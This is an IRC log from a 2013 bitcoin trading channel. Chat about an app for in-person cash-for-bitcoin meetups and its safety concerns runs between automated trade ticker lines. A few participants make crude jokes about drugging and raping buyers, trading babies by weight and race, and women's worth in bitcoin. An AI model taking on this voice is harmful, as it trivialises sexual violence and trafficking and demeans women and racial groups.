cluster of people in one place, you will probably get best price, and feel safest May 27 00:56:50 want to create modal map for this web app May 27 00:56:59 [HAVELOCK] [ASICM] 10 @ 0.0245 = 0.245 BTC [-] May 27 00:57:50 eventually user ratings will basically allow for quick and easy integration with WoT May 27 00:57:54 an exchange will usually keep track of your available funds and prevent you from posting bogus orders May 27 00:57:55 [BTCTC] [ASICMINER-PT] 1 @ 2.46 BTC [+] May 27 00:57:57 allowing for cross exchange brokering May 27 00:57:59 how would you do it? May 27 00:58:15 exchanges would get shut down for holding customer funds too... May 27 00:58:22 that is where rating comes in to play May 27 00:58:25 for instance, whats stopping me from putting a bid for 10,000 btc @ 150 now May 27 00:58:31 absolutely nothing May 27 00:58:36 AirBnB is going towards verified ID. mgr___ would that make sense for you? May 27 00:58:38 but no one will prob take your order seriously May 27 00:58:55 my bid is best May 27 00:59:04 bitbuyer_m: you an airbnb'er, or just a user? May 27 00:59:12 User May 27 00:59:15 bitbuyer_m: you COULD do verified, if you want. I will offer facebook, twitter and google login down the line, with profile pic May 27 00:59:31 kakobrekla: your bid is best korea May 27 00:59:42 also, ideally you would be able to post btc address, which could show balance from blockchain info May 27 00:59:44 It's the sketchiness factor I would worry about May 27 00:59:59 fiat500 best korea better than worst korea May 27 01:00:03 bitbuyer_m: that is what groups solve...i've had new couples bring their infants to the park to buy some bitcoins May 27 01:00:03 mjr___: yeah that'd work for asks May 27 01:00:18 yeah, no help on the cash side May 27 01:00:21 [BTCTC] [GSDPT] 5 @ 0.002724 = 0.0136 BTC [+] May 27 01:00:21 Instant transfer would be cool too. May 27 01:00:32 bitbuyer_m: i was thinking of integrating coinapult for that May 27 01:00:40 But that would take some BTC for working capital May 27 01:00:53 or prepopulating blockchain wllet May 27 01:01:01 nah May 27 01:01:07 no need to hold at first May 27 01:01:12 or.. coinbase? :P May 27 01:01:22 ah yes, or coinbase May 27 01:01:34 I do get the groups thing. Interesting. May 27 01:01:46 i like this, definitely more exciting than crypto-trade May 27 01:01:46 I'd be a little worried about people getting followed home etc May 27 01:01:55 crypto-trade order book right now: crickets May 27 01:02:03 Just seems anachronistic. May 27 01:02:06 might want to faq some basic physical security best practise May 27 01:02:24 bitbuyer_m: meetup.com has a similar model May 27 01:02:43 i picture local groups of friends forming BUILDING COMMUNITY at bars and such May 27 01:02:45 Yes I have done meetups. Not sketchy. May 27 01:02:50 where people know they can buy and sell there May 27 01:03:06 Bars less sketchy than union square park. ;) May 27 01:03:13 kakobrekla: in my talk i should have referenced how we had charts and graphs and everything May 27 01:03:24 lol May 27 01:03:27 bitbuyer_m: i agree...but heavy police presence in union square May 27 01:03:31 hjold on May 27 01:03:48 i was thinking you gonna roll on the stage on a skateboard May 27 01:03:56 bars much more sketchy May 27 01:04:00 I haven't lived in NYC since 04 so probably yuppified May 27 01:04:33 LOL May 27 01:04:46 that gives me an idea... does any online shop ship skateboards on requests to any addy? May 27 01:04:56 http://www.youtube.com/watch?v=kRxAggHtqyQ May 27 01:04:58 slip them a roofie, get some rape and bitcoin in one go May 27 01:05:17 that is me presenting at bitcoin 2013 May 27 01:05:30 I went to that. Sorry missed u. May 27 01:05:37 i am kicking myself for not mentioning the charts and graphs May 27 01:05:39 sexytime May 27 01:05:46 its a proper system May 27 01:06:00 [HAVELOCK] [ASICM] 1 @ 0.0245 BTC [-] May 27 01:06:10 anyway, the mesh network of local bitcoin exchanges is the hardest one to kill May 27 01:06:19 so we'll see how it goes with these new ones May 27 01:06:23 Trap May 27 01:06:29 Yeap I mean May 27 01:06:40 unless theres a local plague >_> May 27 01:06:52 LOL, but the worldwide system of local exchanges shouldn't be affected May 27 01:07:07 I think one person gettig followed and mugged would probably kill the whole thing May 27 01:07:09 in fact, eriks talk on bitcoin as money is awesome May 27 01:07:22 dub: how would anyone know it was tied to this though? May 27 01:07:26 What's the most you think anyone would exchnge in person? May 27 01:07:27 dub: similar to how one person getting mugged in a drug deal has killed the drug trade forever? May 27 01:07:34 $500? May 27 01:07:40 i've done over that by myself May 27 01:07:49 fiat500: if its someone easily identified, a regular May 27 01:07:52 No different than ATM I think May 27 01:07:52 but i think one or two coins per buyer is what i expect May 27 01:07:59 bitbuyer_m: exactly May 27 01:08:18 I take out 300 at ATM and don't worry Bout being mugged May 27 01:08:19 we do it from 5-7 for exactly the reasons you guys have brought up May 27 01:08:28 after work but before dusk May 27 01:08:31 daylight May 27 01:08:33 in a public place May 27 01:08:38 lots of people get mugged at ATMs May 27 01:08:39 with at least 10 cops around the park May 27 01:08:45 dub: and funny how they still exist May 27 01:08:50 lol May 27 01:09:12 you would think that people would think atm's make no sense May 27 01:09:25 Buy some weed while you're at it. At least in old Skool Union Square.... May 27 01:09:27 i walk into a deserted place at 10pm where people KNOW i am going there to get cash May 27 01:09:34 [BTCTC] [TAT.ASICMINER] 11 @ 0.02489 = 0.2738 BTC [-] May 27 01:09:39 and yet robbery is VERY rare May 27 01:10:00 well there are cameras there for one and its not that rare May 27 01:10:02 takes a guy with HUGE balls to walk up to a group of 15 people and try to rob them in broad daylight in a public place May 27 01:10:13 following people home...well that is really on you to be safe May 27 01:10:18 that guy would have hard time running away May 27 01:10:23 ^^ this May 27 01:10:24 balls being the the way May 27 01:10:28 HAHA May 27 01:10:43 anyway, we have done it 3 weeks in a row May 27 01:10:55 and have had people bring their infants, which speaks to how risky they see it being May 27 01:11:05 older gentlemen who aren't good at computers May 27 01:11:18 people who have heard about it but are too lazy to actually go through mt gox process May 27 01:11:24 the first nickname i ever saw anyone use on IRC was "mynutsarelarge" May 27 01:11:33 Lets get the Girl Scouts going door to door to sell BTC May 27 01:11:38 great idea May 27 01:11:40 federal reserve san francisco has great big front sidewalk to do an adhoc. right where occupy used to be May 27 01:11:47 im just saying if it gets out that there have been standover robberies as a result of the meetups it could end the idea May 27 01:11:49 adhoc trading pit May 27 01:11:50 cole_albon: does it? May 27 01:12:01 bitbuyer_m they will be selling JesusCoin May 27 01:12:05 cole_albon: that is how i framed the narrative for the press, an homage to the beginning of wall street May 27 01:12:17 hence project buttonwood May 27 01:12:22 srs lets make a jesuscoin fork May 27 01:12:27 you know amex stocks used to be called "curb stocks" May 27 01:12:30 so many beliver around the globe May 27 01:12:33 belivers May 27 01:12:37 cant fail May 27 01:12:39 you will get luke jr on board i imagine May 27 01:12:43 [BTCTC] [TAT.ASICMINER] 4 @ 0.02495 = 0.0998 BTC [+] May 27 01:12:44 oh ya! May 27 01:13:22 anyway, this is certainly not the only way to get bitcoins May 27 01:13:30 but i think its the easiest, fastest and safest May 27 01:13:45 so it works for me May 27 01:13:46 mjr___: doesnt work for me here in the mideast tho :( May 27 01:13:52 dubai? May 27 01:13:56 nope May 27 01:14:01 ah, well...it could work May 27 01:14:08 No public gatherings? May 27 01:14:13 if enough people start becoming interested May 27 01:14:16 round trip to dubai is $600 May 27 01:14:24 public is not exactly accurate May 27 01:14:28 well, critical mass problem May 27 01:14:29 you can hold meetings at people's houses May 27 01:14:30 if you want May 27 01:14:39 not an issue of meeting publicly May 27 01:14:39 but yeah, i imagine its hard to find a critical mass May 27 01:14:47 BUT, if you could all see each other May 27 01:14:50 anyway, i am out of here in 2 weeks May 27 01:14:53 it would help towards building that mass May 27 01:15:05 we have over 200 in our meetup group in nyc May 27 01:15:12 wow May 27 01:15:17 and they are all going to trade? May 27 01:15:19 Different people every week? May 27 01:15:20 nah May 27 01:15:29 there is a core group of market makers and entrepreneurs May 27 01:15:29 Or a few regular sellers and different buyers? May 27 01:15:40 the rest of the people are interested in the idea, or are just looking to buy or sell real quick May 27 01:15:44 one each of 150 different LE agencies May 27 01:16:13 well, none of them have asked us any questions and we aren't being quiet about it May 27 01:16:13 No "street permit" required like the African guys selling Louis Vuitton ripoffs? May 27 01:16:17 40 would be scammers May 27 01:16:24 [BTCTC] [CRYPTO-TRADE] 1 @ 0.2 BTC [+] May 27 01:16:25 LOL May 27 01:16:29 so far, we haven't had any issues May 27 01:16:33 not to say there won't be any May 27 01:16:39 mjr lots of people show up every week to high schools football. maybe that would work in the midwest May 27 01:16:48 Church May 27 01:16:50 but stopping in person transactions is pretty much impossible (see: war on drugs) May 27 01:17:00 yes May 27 01:17:02 Go south young man May 27 01:17:05 hehehe May 27 01:17:10 it could work anywhere May 27 01:17:10 18,000 in a church May 27 01:17:12 inb4 they make a law against more than 5 people standing around in a group bumping phones together May 27 01:17:18 lol May 27 01:17:21 we don't bump phones May 27 01:17:34 the cash is the more obvious side of it May 27 01:17:34 Should u? May 27 01:17:52 as far as i know there is no bump type app for btc trading May 27 01:18:02 though that is a great idea May 27 01:18:02 um May 27 01:18:09 try bitcoin.org May 27 01:18:09 so far most use qr codes May 27 01:18:25 the first android app on there as NFC May 27 01:18:25 QR codes good too May 27 01:18:33 nfc doesn't require bumping does it? May 27 01:18:54 thought it was like rfid or bluetooth May 27 01:18:58 can be a foot away May 27 01:19:00 [HAVELOCK] [ASICM] 1 @ 0.0245 BTC [-] May 27 01:19:25 besides, its easy to send btc over the internet May 27 01:19:32 What kind of fees do sellers charge for in person trading? May 27 01:19:38 lol none May 27 01:19:43 its a spread system May 27 01:19:51 they probably sell for more than they bought May 27 01:19:54 but not really a fee May 27 01:19:59 similar to travelex May 27 01:20:09 What exchange rate? May 27 01:20:09 i'll buy at a certain price and sell at a higher price May 27 01:20:18 most of the time its centered around gox May 27 01:20:27 maybe a percent or two above or below May 27 01:20:32 but really up to the people involved May 27 01:20:35 But a micro market at the meetup? May 27 01:20:53 well, we hang out for two hours May 27 01:20:59 and advertise it on reddit May 27 01:21:00 bit buyer I've done a handful of face to face trades, mt gox is a good price for both parties typically. May 27 01:21:11 i think the winklevoss will show up to trade on monday (or maybe next week) May 27 01:21:30 I guess that seems like a short term solution when people have gains... May 27 01:21:31 O_o May 27 01:21:39 yeah May 27 01:21:43 i mean, we will see May 27 01:21:48 its getting great press May 27 01:22:03 and i think the app makes it very easy to adjust your orders May 27 01:22:04 But it seems like you will need an incentive down the road -- either micro market or fees May 27 01:22:19 in fact, not to toot my own horn, i don't think its that easy to adjust orders on any "real" exchange May 27 01:22:37 You could geo fence the group May 27 01:22:56 And have just the people there be in the micro market May 27 01:23:06 bitbuyer_m: i plan on (and this is subject to change) one server per city, cross linked to a main aggregated order book May 27 01:23:27 one of my friends helping already has started calculating distances to orders May 27 01:23:36 so you can see distance per order from you May 27 01:23:54 so you could filter by 100m, 1000m or 10000m May 27 01:24:16 make a layar for it May 27 01:24:24 dub: awesome idea!!! May 27 01:24:27 i love layar May 27 01:24:35 and i think tht could work very well May 27 01:25:54 also, i think that once you get a good rating system, OTC will want to have access to these markets May 27 01:26:07 OTC would make a great glue to join them all May 27 01:26:39 by the way, location SHOULD update as you walk around...not sure cuz i haven't tested, but that is how its built May 27 01:27:14 right now i am working on map to show all orders, then i want to build a pop up modal window with more info about a specific order when you click on that order May 27 01:27:29 including option to notify that user May 27 01:27:45 at first, prob by email May 27 01:27:48 [BTCTC] [BITVPS] 2 @ 0.000932 = 0.0019 BTC [+] May 27 01:27:50 but hoping for other methods soon May 27 01:28:14 dub: i am going to look into the layar thing, that could be awesome! May 27 01:29:41 well again im going to caution against putting targets on people, its one thing to have it active while in the park May 27 01:29:56 yeah May 27 01:30:07 yeah of course May 27 01:30:12 close the page you are done being tracked May 27 01:30:19 and you can always turn off location if you want May 27 01:30:35 the guy helping me with the app is here! May 27 01:30:35 [BTCTC] [TAT.ASICMINER] 1 @ 0.024923 BTC [-] May 27 01:30:40 qxzn: take a bow May 27 01:30:47 he has been awesome at helping me with coding May 27 01:30:53 he is a lot better of a dev than i am May 27 01:31:24 i was struggling with learning this framework and couldn't figure out how to only let users cancel their own orders May 27 01:31:40 [BTCTC] [TAT.ASICMINER] 4 @ 0.024923 = 0.0997 BTC [-] May 27 01:32:48 qxzn figured that out May 27 01:33:02 and we were working on it at the conference, we pitched it together at the start of the hackathon May 27 01:33:06 [BTCTC] [TAT.ASICMINER] 6 @ 0.024923 = 0.1495 BTC [-] May 27 01:33:21 he is a fellow meetup friend in nyc May 27 01:34:17 anyways, i'm here May 27 01:35:16 [BTCTC] [BITVPS] 1 @ 0.000932 BTC [+] May 27 01:35:44 [MPEX] [S.MPOE] 11000 @ 0.00068329 = 7.5162 BTC [-] May 27 01:35:46 [MPEX] [S.MPOE] 4217 @ 0.00068354 = 2.8825 BTC [+] May 27 01:35:47 hey hey May 27 01:35:59 :curtsy: May 27 01:35:59 [MPEX] [S.MPOE] 10255 @ 0.00068548 = 7.0296 BTC [+] May 27 01:36:33 lol May 27 01:36:48 "admin: 161 members in 7 hours, come on guy we can do better " May 27 01:36:55 from crypto-trade trollbox May 27 01:37:05 is crypto trade different from cryptostreet? May 27 01:37:23 never heard of the latter May 27 01:39:04 http://snapplr.com/xqn8 May 27 01:39:14 who are we dealing with here May 27 01:39:19 [BTCTC] [ASICMINER-PT] 1 @ 2.438 BTC [-] May 27 01:39:38 heh, thats me ruled out May 27 01:40:20 LOL May 27 01:40:24 i need a trollbox on my site May 27 01:40:45 i have slightly less respect for any site that takes or uses xrp May 27 01:41:11 man they are managing deposits manually May 27 01:44:13 just link in #bitcoin-trollbox May 27 01:44:59 [HAVELOCK] [ASICM] 8 @ 0.0245 = 0.196 BTC [-] May 27 01:45:28 i wonder how hard it'd be to link to an irc channel from a web app May 27 01:45:32 like in page May 27 01:45:43 i'll worry about that eventually May 27 01:46:18 [BTCTC] [BITVPS] 1 @ 0.000932 BTC [+] May 27 01:53:20 [BTCTC] [S.DICE-PT] 3 @ 0.002911 = 0.0087 BTC [-] May 27 02:01:55 [BTCTC] [ASICMINER-PT] 1 @ 2.46 BTC [+] May 27 02:02:25 people bring their infants.. to trade them for bitcoins? May 27 02:02:28 [BTCTC] [ASICMINER-PT] 1 @ 2.4629 BTC [+] May 27 02:02:50 [BTCTC] [ASICMINER-PT] 1 @ 2.4645 BTC [+] May 27 02:03:13 [BTCTC] [ASICMINER-PT] 1 @ 2.464699 BTC [+] May 27 02:03:30 yeah depending on weight and race, one baby could fetch 100btc May 27 02:04:04 brad and ange need'nt go to africa anymore May 27 02:04:27 [BTCTC] [TAT.ASICMINER] 9 @ 0.024923 = 0.2243 BTC [-] May 27 02:05:21 [BTCTC] [TAT.ASICMINER] 73 @ 0.02495 = 1.8214 BTC [+] May 27 02:05:30 mjr___ very interesting... can i see some hub on which places it's planned? May 27 02:06:24 [BTCTC] [CRYPTO-TRADE] 30 @ 0.2 = 6 BTC [+] May 27 02:07:53 jurov: how so? and 100 btc for a baby is kinda steep May 27 02:09:34 [BTCTC] [ASICMINER-PT] 2 @ 2.4648 = 4.9296 BTC [+] May 27 02:11:10 i mean, i'm interested if someone plans exchange meetup nearby May 27 02:12:20 bitcoins for fiat, not for children :) May 27 02:12:46 [BTCTC] [TAT.ASICMINER] 3 @ 0.0248 = 0.0744 BTC [-] May 27 02:13:48 well so far, only berlin has been very eager May 27 02:13:54 but sydney australia wants to as well May 27 02:13:58 some guys in paris May 27 02:14:02 and some guys in san francisco May 27 02:14:26 mjr___: count me in with the SF peeps May 27 02:17:26 well, its an open source project, very easy to deploy May 27 02:17:32 i'd like to still be involved on the other cities May 27 02:17:55 but if anyone wants a server up, they can ask and they can have the same version we have in nyc within an hour May 27 02:18:01 just tell me URL May 27 02:18:34 ah you have a server for each location? May 27 02:19:20 i will host it, all i need from whichever city asks is a url, and show me a meetup group or something that shows you will be the center for people to aggregate around May 27 02:19:29 (not one server per person) May 27 02:28:22 so, i leave it to the locations to figure out meetups, get like 10 people together, i will give you server running whatever we run in nyc May 27 02:29:59 [HAVELOCK] [ASICM] 8 @ 0.02461 = 0.1969 BTC [+] May 27 02:30:03 dunno if i have the energy to be "in charge" of anything, if the SF thing goes up plz lemme know tho lol May 27 02:35:01 [MPEX] [S.MPOE] 8700 @ 0.00068072 = 5.9223 BTC [-] May 27 02:35:53 like in page << well webirc does it. May 27 02:36:36 [BTCTC] [TAT.ASICMINER] 2 @ 0.0248 = 0.0496 BTC [-] May 27 02:43:06 [BTCTC] [ASICMINER-PT] 1 @ 2.441 BTC [-] May 27 02:43:08 [BTCTC] [ASICMINER-PT] 1 @ 2.4401 BTC [-] May 27 02:45:59 [HAVELOCK] [SDICE] 87 @ 0.2399 = 20.8713 BTC [-] May 27 02:48:02 [BTCTC] [ASICMINER-PT] 1 @ 2.4648 BTC [+] May 27 02:49:24 [BTCTC] [LTC-MINING] 1 @ 0.439999 BTC [+] May 27 02:49:26 [BTCTC] [LTC-MINING] 2 @ 0.44 = 0.88 BTC [+] May 27 02:49:32 fun: https://bitcointalk.org/index.php?topic=133147.msg2279211#msg2279211 May 27 02:50:01 [BTCTC] [TAT.ASICMINER] 3 @ 0.024525 = 0.0736 BTC [-] May 27 02:50:19 [BTCTC] [CRYPTO-TRADE] 1 @ 0.2 BTC [+] May 27 02:50:19 who said anything about HFT May 27 02:50:39 an order per minute is HFT in bitcoinworld May 27 02:50:54 lol May 27 02:51:25 fiat500: yeah, i'll let you know May 27 02:51:27 [BTCTC] [TAT.ASICMINER] 15 @ 0.024501 = 0.3675 BTC [-] May 27 02:51:43 fiat500: i mean, its not a big deal, not really "in charge" May 27 02:51:56 [BTCTC] [TAT.ASICMINER] 33 @ 0.0245 = 0.8085 BTC [-] May 27 02:52:21 fiat500: also i plan on building some consensus building tools into the app, so that groups can more organically pick where to meet May 27 02:52:34 link that in to meetup.com perhaps May 27 02:52:43 nice May 27 02:52:52 you seem to have great plans for this May 27 02:52:52 is dat some bitcoin dating site May 27 02:53:02 looking forward to see how this goes May 27 02:53:06 mircea_popescu: yes, i know i can use irc from the web, but actually as an embedded and hideable element in the page May 27 02:53:14 kakobrekla: THAT is the idea May 27 02:53:28 a female bitcoin user is like worth 100 btc probably at this point May 27 02:53:31 to early adopters May 27 02:53:34 what i mean is obviously it can be done since they do it. May 27 02:53:43 mircea_popescu: yes, of course May 27 02:53:49 haven't seen the page May 27 02:54:12 [BTCTC] [CRYPTO-TRADE] 3 @ 0.199 = 0.597 BTC [-] May 27 02:54:13 i just meant like keeping it in my page without disrupting other things...i want everything to be hideable May 27 02:54:34 the map will be a modal window, which will drop down and then go back up showing the order book May 27 02:54:48 trying to show as much info in basically an iphone screen May 27 02:55:03 that is why i put gox prices into order submission, save space May 27 02:55:22 and those are not like live updating or anything yet, just a rough guide to where one market is May 27 02:57:10 [BTCTC] [TAT.ASICMINER] 10 @ 0.0248 = 0.248 BTC [+] May 27 02:57:31 [BTCTC] [CRYPTO-TRADE] 7 @ 0.194 = 1.358 BTC [-] May 27 02:57:52 [BTCTC] [TAT.ASICMINER] 2 @ 0.0248 = 0.0496 BTC [+] May 27 02:57:53 [BTCTC] [TAT.ASICMINER] 2 @ 0.0245 = 0.049 BTC [-] May 27 02:57:54 [BTCTC] [TAT.ASICMINER] 3 @ 0.0245 = 0.0735 BTC [-] May 27 02:59:58 [HAVELOCK] [ASICM] 39 @ 0.02461 = 0.9598 BTC [+] May 27 03:00:00 [HAVELOCK] [ASICM] 1 @ 0.02464 BTC [+] May 27 03:01:58 [HAVELOCK] [ASICM] 39 @ 0.02464 = 0.961 BTC [+] May 27 03:02:04 [BTCTC] [BITVPS] 16 @ 0.000932 = 0.0149 BTC [+] May 27 03:03:59 [HAVELOCK] [ASICM] 36 @ 0.0246 = 0.8856 BTC [-] May 27 03:04:00 [HAVELOCK] [ASICM] 10 @ 0.02463 = 0.2463 BTC [+] May 27 03:05:28 mjr___ prolly better to use some other protocol May 27 03:05:37 for that job May 27 03:05:58 something like btce trollbox May 27 03:06:12 you can make it yourself May 27 03:06:16 well, i'd like both May 27 03:06:20 i can build a chat room no prob May 27 03:06:30 but linking in to irc would make integration with WoT a LOT easier May 27 03:07:15 [BTCTC] [ASICMINER-PT] 2 @ 2.4648 = 4.9296 BTC [+] May 27 03:07:24 hmm May 27 03:07:52 i wont keep my key on a phone May 27 03:08:00 how will you go around that **** BEGIN LOGGING AT Mon May 27 13:43:39 2013 May 27 13:47:39 [BTCTC] [TAT.ASICMINER] 1 @ 0.024995 BTC [+] May 27 13:50:31 [MPEX] [S.MPOE] 2266 @ 0.0006838 = 1.5495 BTC [+] May 27 13:50:33 [MPEX] [S.MPOE] 4321 @ 0.00068414 = 2.9562 BTC [+] May 27 13:50:34 [MPEX] [S.MPOE] 6084 @ 0.00068415 = 4.1624 BTC [+] May 27 13:51:03 [HAVELOCK] [ASICM] 22 @ 0.024794 = 0.5455 BTC [+] May 27 13:56:02 [HAVELOCK] [ASICM] 84 @ 0.024795 = 2.0828 BTC [+] May 27 14:06:52 [BTCTC] [TAT.ASICMINER] 21 @ 0.024994 = 0.5249 BTC [-] May 27 14:09:02 [HAVELOCK] [ASICM] 6 @ 0.024799 = 0.1488 BTC [+] May 27 14:09:47 [BTCTC] [ASICMINER-PT] 1 @ 2.465 BTC [+] May 27 14:17:00 [BTCTC] [ASICMINER-PT] 3 @ 2.465 = 7.395 BTC [+] May 27 14:20:03 [HAVELOCK] [ASICM] 100 @ 0.024799 = 2.4799 BTC [+] May 27 14:20:52 [BTCTC] [ASICMINER-PT] 5 @ 2.47 = 12.35 BTC [+] May 27 14:24:08 [BTCTC] [ASICMINER-PT] 1 @ 2.47 BTC [+] May 27 14:26:09 [BTCTC] [TAT.ASICMINER] 38 @ 0.024995 = 0.9498 BTC [+] May 27 14:26:11 [BTCTC] [TAT.ASICMINER] 26 @ 0.024995 = 0.6499 BTC [+] May 27 14:26:25 [BTCTC] [CRYPTO-TRADE] 20 @ 0.195 = 3.9 BTC [+] May 27 14:26:44 [BTCTC] [CRYPTO-TRADE] 1 @ 0.198997 BTC [+] May 27 14:28:58 [BTCTC] [ASICMINER-PT] 1 @ 2.47 BTC [+] May 27 14:29:41 [BTCTC] [CRYPTO-TRADE] 7 @ 0.199 = 1.393 BTC [+] May 27 14:38:55 ;;nethash May 27 14:38:56 100661.415444 May 27 14:39:01 ;;bc,stats May 27 14:39:02 Current Blocks: 238188 | Current Difficulty: 1.2153411709775832E7 | Next Difficulty At Block: 239903 | Next Difficulty In: 1715 blocks | Next Difficulty In About: 1 week, 2 days, 16 hours, 32 minutes, and 32 seconds | Next Difficulty Estimate: 14177334.8621 | Estimated Percent Change: 16.65313 May 27 14:40:59 ahhh teriaki salmon May 27 14:41:37 kakobrekla https://bitcointalk.org/index.php?topic=215601.msg2283504#msg2283504 dude is that true ? May 27 14:46:46 [BTCTC] [TAT.ASICMINER] 43 @ 0.02495 = 1.0729 BTC [-] May 27 14:56:13 [BTCTC] [BASIC-MINING] 1 @ 0.59969 BTC [+] May 27 15:00:21 [BTCTC] [CRYPTO-TRADE] 1 @ 0.190007 BTC [-] May 27 15:00:22 [BTCTC] [CRYPTO-TRADE] 1 @ 0.190002 BTC [-] May 27 15:00:42 [BTCTC] [GSDPT] 7 @ 0.00272 = 0.019 BTC [-] May 27 15:03:35 [BTCTC] [ASICMINER-PT] 1 @ 2.454 BTC [-] May 27 15:03:54 [BTCTC] [ASICMINER-PT] 1 @ 2.453 BTC [-] May 27 15:04:19 [BTCTC] [ASICMINER-PT] 1 @ 2.452 BTC [-] May 27 15:04:35 [BTCTC] [ASICMINER-PT] 1 @ 2.451 BTC [-] May 27 15:04:50 [BTCTC] [ASICMINER-PT] 1 @ 2.453 BTC [+] May 27 15:05:37 [BTCTC] [TAT.ASICMINER] 2 @ 0.02462 = 0.0492 BTC [-] May 27 15:05:39 [BTCTC] [TAT.ASICMINER] 3 @ 0.02462 = 0.0739 BTC [-] May 27 15:05:56 [BTCTC] [CRYPTO-TRADE] 10 @ 0.199 = 1.99 BTC [+] May 27 15:06:42 [BTCTC] [TAT.ASICMINER] 10 @ 0.02462 = 0.2462 BTC [-] May 27 15:08:28 [BTCTC] [ASICMINER-PT] 1 @ 2.451 BTC [-] May 27 15:08:53 [BTCTC] [ASICMINER-PT] 1 @ 2.4505 BTC [-] May 27 15:09:19 [BTCTC] [ASICMINER-PT] 1 @ 2.4502 BTC [-] May 27 15:09:47 [BTCTC] [ASICMINER-PT] 15 @ 2.45001 = 36.7502 BTC [-] May 27 15:10:47 [BTCTC] [ASICMINER-PT] 1 @ 2.4505 BTC [+] May 27 15:11:03 [HAVELOCK] [ASICM] 10 @ 0.0246 = 0.246 BTC [-] May 27 15:13:33 [BTCTC] [ASICMINER-PT] 3 @ 2.47 = 7.41 BTC [+] May 27 15:13:42 [BTCTC] [ASICMINER-PT] 1 @ 2.446 BTC [-] May 27 15:14:03 [HAVELOCK] [ASICM] 1 @ 0.024508 BTC [-] May 27 15:15:03 [HAVELOCK] [ASICM] 12 @ 0.024508 = 0.2941 BTC [-] May 27 15:15:05 [MPEX] [S.MPOE] 4321 @ 0.00068405 = 2.9558 BTC [-] May 27 15:15:05 [MPEX] [S.MPOE] 4179 @ 0.00068415 = 2.8591 BTC [+] May 27 15:16:16 [BTCTC] [ASICMINER-PT] 4 @ 2.475 = 9.9 BTC [+] May 27 15:17:02 [HAVELOCK] [ASICM] 26 @ 0.024507 = 0.6372 BTC [-] May 27 15:17:04 [HAVELOCK] [ASICM] 22 @ 0.024506 = 0.5391 BTC [-] May 27 15:17:44 [MPEX] [S.MPOE] 8964 @ 0.00068415 = 6.1327 BTC [+] May 27 15:18:02 [HAVELOCK] [ASICM] 1 @ 0.02450402 BTC [-] May 27 15:18:04 [HAVELOCK] [ASICM] 75 @ 0.02450001 = 1.8375 BTC [-] May 27 15:18:05 [HAVELOCK] [ASICM] 4 @ 0.02450001 = 0.098 BTC [-] May 27 15:19:03 [HAVELOCK] [ASICM] 75 @ 0.0245 = 1.8375 BTC [-] May 27 15:43:41 [BTCTC] [ASICMINER-PT] 1 @ 2.474 BTC [-] May 27 15:44:28 [BTCTC] [TAT.ASICMINER] 4 @ 0.02495 = 0.0998 BTC [+] May 27 15:44:44 [BTCTC] [TAT.ASICMINER] 39 @ 0.0249 = 0.9711 BTC [-] May 27 16:01:06 [BTCTC] [ASICMINER-PT] 3 @ 2.475 = 7.425 BTC [+] May 27 16:08:42 asciilifeform http://www.forbes.com/sites/andygreenberg/2013/05/05/meet-the-liberator-test-firing-the-worlds-first-fully-3d-printed-gun/ May 27 16:09:16 i guess locklin is writing his apology already, in the terms of "Mircea Popescu was right, I'm a clueless douche with no education and too much ambition, and as a result I say stupid shit". May 27 16:21:32 [MPEX] [S.MPOE] 12900 @ 0.00068326 = 8.8141 BTC [-] May 27 16:22:25 [BTCTC] [TAT.ASICMINER] 1 @ 0.02495 BTC [+] May 27 16:32:01 [BTCTC] [ASICMINER-PT] 1 @ 2.451 BTC [-] May 27 16:32:03 [BTCTC] [ASICMINER-PT] 1 @ 2.4502 BTC [-] May 27 16:40:55 [MPEX] [S.MPOE] 4321 @ 0.00068025 = 2.9394 BTC [-] May 27 16:40:57 [MPEX] [S.MPOE] 6529 @ 0.00068018 = 4.4409 BTC [-] May 27 16:44:26 [BTCTC] [CRYPTO-TRADE] 13 @ 0.199 = 2.587 BTC [+] May 27 16:50:59 [BTCTC] [TAT.ASICMINER] 1 @ 0.02495 BTC [+] May 27 16:59:31 BTC/USD CFDs reopened, we'll see: https://bitcointalk.org/index.php?topic=123492.msg2279868#msg2279868 May 27 17:02:18 [BTCTC] [S.DICE-PT] 1 @ 0.00324 BTC [+] May 27 17:06:41 [BTCTC] [TAT.ASICMINER] 1 @ 0.02469 BTC [-] May 27 17:12:30 [BTCTC] [TAT.ASICMINER] 1 @ 0.02468 BTC [-] May 27 17:12:32 [BTCTC] [TAT.ASICMINER] 1 @ 0.02467 BTC [-] May 27 17:12:33 [BTCTC] [TAT.ASICMINER] 8 @ 0.02467 = 0.1974 BTC [-] May 27 17:15:21 [BTCTC] [S.DICE-PT] 6 @ 0.002741 = 0.0164 BTC [-] May 27 17:16:22 [BTCTC] [TAT.ASICMINER] 1 @ 0.02469 BTC [+] May 27 17:18:04 [HAVELOCK] [ASICM] 1 @ 0.024689 BTC [+] May 27 17:22:44 [BTCTC] [TAT.ASICMINER] 6 @ 0.02478 = 0.1487 BTC [+] May 27 17:23:24 [BTCTC] [S.DICE-PT] 6 @ 0.003249 = 0.0195 BTC [+] May 27 17:24:25 [BTCTC] [CRYPTO-TRADE] 3 @ 0.190002 = 0.57 BTC [-] May 27 17:30:04 [HAVELOCK] [ASICM] 10 @ 0.024689 = 0.2469 BTC [+] May 27 17:36:03 [HAVELOCK] [ASICM] 4 @ 0.024689 = 0.0988 BTC [+] May 27 17:37:08 [BTCTC] [TAT.ASICMINER] 3 @ 0.024671 = 0.074 BTC [-] May 27 17:38:34 [BTCTC] [PAJKA.BOND] 3 @ 0.109989 = 0.33 BTC [+] May 27 17:43:53 [BTCTC] [BTC-BOND] 9 @ 0.0105 = 0.0945 BTC [+] May 27 17:46:34 [MPEX] [S.MPOE] 6750 @ 0.00068035 = 4.5924 BTC [+] May 27 17:49:38 [BTCTC] [TAT.ASICMINER] 6 @ 0.02467 = 0.148 BTC [-] May 27 17:49:41 [BTCTC] [TAT.ASICMINER] 9 @ 0.02462 = 0.2216 BTC [-] May 27 17:49:45 [BTCTC] [TAT.ASICMINER] 4 @ 0.02461 = 0.0984 BTC [-] May 27 17:53:22 [BTCTC] [TAT.ASICMINER] 8 @ 0.02461 = 0.1969 BTC [-] May 27 17:53:53 I am looking to sell the last 122 ASICMINER shares, I can give you a bit better price for a fast deal :) May 27 17:54:31 [BTCTC] [TAT.ASICMINER] 8 @ 0.02469 = 0.1975 BTC [+] May 27 17:56:37 [BTCTC] [ASICMINER-PT] 1 @ 2.4551 BTC [+] May 27 17:57:21 [BTCTC] [TAT.ASICMINER] 7 @ 0.024511 = 0.1716 BTC [-] May 27 17:58:03 terra, where, how, minimum order, how much? May 27 17:58:04 :) May 27 17:58:26 [BTCTC] 